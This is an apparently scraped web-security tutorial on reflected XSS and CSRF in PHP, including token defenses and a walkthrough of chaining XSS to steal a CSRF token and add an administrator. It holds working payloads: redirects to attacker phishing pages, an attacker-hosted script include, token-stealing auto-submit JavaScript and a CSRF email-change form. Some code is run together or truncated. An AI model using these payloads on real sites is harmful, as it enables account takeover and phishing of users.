Research | Bypass CSRF Protection w/ XSS

1 year ago 87

BOOK THIS SPACE FOR AD

ARTICLE AD

In Brief: Web Application receives data from the client from GET function, then displays it.

if(isset($_GET['text']))
{
$var = $_GET['text'];
print $var;
}
// This code checks if the 'text' variable is set for the GET request.
// The code stores its contents in a variable called "$var", And prints its contents.The request will look like this: http://www.site.com/script.php?text=testWhat happens if we make it like this:http://www.site.com/script.php?text=script>code_javascript</script>Well, the javascript code will be executed!

💡 Most often, this problem is found in the search box, regardless if the files are sent using POST, or send by GET, the return message will be something like: “You searched for ’test’ “

Cookie GrabberPhishing Attackshttp://www.site.com/script.php?text=<script>document.location.href="http://www.site-attacker.com/phishing.html"</script>Scam Page<iframe src="http://attacker.com/phishing_page_identical_copy_of_the_aplication_page.html" style="z-index: 0; position: absolute; top: 0; left: 0; height:100%; width:100%;"></iframeMaking Pages Cooler!<script>document.images[4].src="http://rstcenter.com/up/director/RST.png"</script>Using htmlspechialchars function w/ PHPif(isset($_GET['text'])) { $var= $_GET['text']; print htmlentities($var, ENT_QUOTES); // Or print htmlspecialchars($var, ENT_QUOTES); }If the Input is specific Datatype (int, float,..):Typecast the value to the corresponding datatype using functions like int(),float()Validate the variable with the corresponding Datatype using is_numeric(),is_float() etc.if (is_numeric($id) == True){ <code> }

What makes this vulnerability possible is the automation of action, this action is made in general by the application administrators. For this type of vulnerability, the victims are authenticated users of the application, and CSRF lets them automate some actions that they can do.

The administration panel has a page where he can delete an article, just by clicking on a link.http://www.site.com/admin/delete_articol?articol_id=123The attacker can make a page on which he can put the following code:<iframe src="http://www.site.com/admin/delete_articol?articol_id=123" width="0"
height="0"></iframWhen the victim,in our case the administrator visits this webpage, he will make a request to delete the page without knowing.if(isset($_POST['login'])){
// Check login
$_SESSTION['token'] = Random();
}function Random(){
$chars =
array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y',' Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9');
shuffle($chars);
$sir = substr(implode('', $chars), 0, 10);
return $sir;
}
// The random string is generated by the Random() function, which creates an array
// of characters, shuffles them, and then combines them into a string of 10 characters,
// which is returned as the function's output.
// This token can then be used as an extra layer of security to prevent (CSRF) attacksFor example, when deleting a file, when we create the download link, we add this token:print '<a href="admin.php?action=delete_articol&articol_id' . $date['id'] . '&token=' . $_SESSION['token'] . '">Delete</a>';Therefore, the link for the deletion will be something like this:

http://www.site.com/admin.php?action=delete_articol&articol_id=123&token=qdY4f6FTpO

To delete the article we need to verify that the token is the one in the session:

if(isset($_GET['delete_articol'])){
if($_SESSION['token'] == $_GET['token']){
// delete_specified_article();
}
else print 'The token does not match, you may be a victim on CSRF';
}

💡 Other methods, safer but more “time consuming” would be to ask for users/administrator passwords for every important action, or to add a CAPTCHA image and verify the text entered by the us

Let’s take an example, adding a new administrator depending on the name of the user who will become an administrator. This will happen in the folder /admin which is not vulnerable to CSRF.

/admin/admin.php?action=add_admin ( for example ):

http://www.site.com/add_admin.php?name=Nytro&token=1htFI0iA9s&submit

When verifying, the token from the session will be the same as the one sent from the form, and nitro will be an administrator.

<?php
session_start();
if(isset($_GET['submit'])){
if($_SESSION['token'] == $_GET['token']){
// we_make_nytro_admin();
print 'Nytro is now an admin.';
}
else print 'Token invalid _|_ :)';
}
?>

When verifying,the token from the session will be the same with the one send from the form , and nitro will be an administrator.

How to obtain the token?

We will consider on the main page (index.php), the vulnerable application which contains the following code:<?php if(isset($_GET['name'])) { print 'Hello, ' . $_GET['name']; } ?>

To simplify things, we won’t write our javascript code directly in the request, instead we will write it in a .js file which we will consider uploaded on: http://www.attacker.com/script.js

In request we will use:

http://www.site_vulnerable.com/index.php?nume=``

The attacker creates an iframe that opens the targeted website’s administration page by using the following code:document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin" width="0" height="0" onload="read()"></iframe>');Then he uses the obtained token to construct a malicious link that redirects the victim to a page controlled by the attacker. The following code is used for this:var name = 'Nytro';
var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
document.location.href = 'http://127.0.0.1/admin/add_admin.php?name=' + name + '&token=' + token + '&submit';The attacker can hide the iframe to conceal the attack from the victim by using the following code:<iframe src='http://site_victim.com/index.php?name=<script src="http://127.0.0.1/script.js"></script>'
width="300" height="300"></iframe>XSS can be used to obtain administrator rights on a vBulletin or phpBB forumThe data may have to be sent twice using POST and can be done using an iframe within an iframeIt is possible to read a token from a page protected by CSRF and create a form with that tokenThis script uses an iframe to load the page that is protected by CSRF, writes a wanted name in the form, and then presses the submit button.This can be done more easily by using the content document property in Mozilla browsers, however, this might not work on all browsers.document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin" width="0" height="0" onload="read()"></iframe>');
function read() {
var name = 'Nytro';
var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
document.writeln('<form width="0" height="0" method="post" action="/admin/add_admin.php">');
document.writeln('<input type="text" name="name" value="' + name + '" /><br />');
document.writeln('<input type="hidden" name="token" value="' + token + '" />');
document.writeln('<input type="submit" name="submit" value="Add_admin" /><br />');
document.writeln('</form>');
document.forms[0].submit.click();
}document.writeln('<iframe id="iframe" src="/admin/admin.php?actiune=add_admin" width="0" height="0" onload="read()"></iframe>');
function read() {
var name = 'Nytro';
document.getElementById("iframe").contentDocument.forms[0].name.value = name;
document.getElementById("iframe").contentDocument.forms[0].submit.click();
}

Look at this request:

POST /home/accountsettings HTTP/1.1
Host: websecgeeks.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Referer: http://websecgeeks.com/
Connection: keep-alive
Content-Length: 57
newemail=attacker@something.com&Submit=SWe can say that this code might be vulnerable to CSRF, as there is no Random Tokens exist.Let’s try to make an exploit:<html>
<body>
<form action="http://websecgeeks.com/home/accountsettings" method="POST">
<input type="hidden" name="newemail" value="attacker@attacker.com" />
<input type="hidden" name="Submit" value="Save" />
<input type="submit" value="Submit form" />
</form>
</body> </htmlHowever, when executing the page in an authenticated session, the application logged out.The application was validating the Referrer Value and tried manually adding a valid value, but the application still logged out.The Researcher found a JavaScript code that was responsible for this protection:if(window.opener ==null){ top.location.href="/homedirectory/logoutuser"; }This code checks for the value of the window.opener property and if it is null, the application logs the user out and terminates the sessionAccording to the Windows Opener Description.When a window is opened from another window, it maintains a reference to that first window as window.opener.If the current window has no opener, this method returns NULL.Windows Phone browser does not support window.opener. It is also not supported in IE if the opener is in a different security zone.Now anyhow we have to set the windows opener value while doing a CSRF attack.To successfully perform a CSRF attack on this application, the attacker must set the window.opener value to a non-null value.Let’s create two pages xss.php csrf.html hosted on localhost.The xss.php the page contained an un-filtered parameter called “zip” with a link to the csrf3.html pageThe csrf3.html the page contained a form with hidden fields for automatically submitting values when openedThe final URL sent to the victim was http://127.0.0.1/xss.php?zip= <a href="[http://127.0.0.1/csrf3.html](http://127.0.0.1/csrf3.html)">Link For Target Application</a>After clicking the link, the attacker was able to open a new page in a new tab without getting logged out and bypassing CSRF security

“Client-side security is not foolproof, so it is important to properly implement solutions for preventing web application attacks”

References => ExploitDB Paper

Read Entire Article